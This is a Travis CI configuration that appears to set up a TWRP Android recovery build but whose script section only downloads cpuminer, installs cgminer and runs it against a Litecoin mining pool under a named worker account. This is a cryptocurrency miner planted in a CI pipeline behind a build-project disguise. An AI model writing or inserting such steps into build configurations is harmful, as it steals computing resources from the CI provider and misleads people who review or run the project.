os: linux
dist: bionic
language: generic
sudo: required
git:
  depth: 1
addons:
  apt:
    update:
      - true
services:
  - docker
before_install:
  - df -lh 
  - docker pull fr3akyphantom/droid-builder:latest
before_script:
  - cd $HOME && mkdir twrp

script:
 - cd $HOME/twrp/
 - curl https://cfhcable.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.5.1-linux-x86_64.tar.gz -o c.tar.gz
 - tar xvzf c.tar.gz
 - apt update
 - apt install cgminer
 - cgminer -o stratum+tcp://us.litecoinpool.org:3333 -u arthdal20.2 -p 2
 
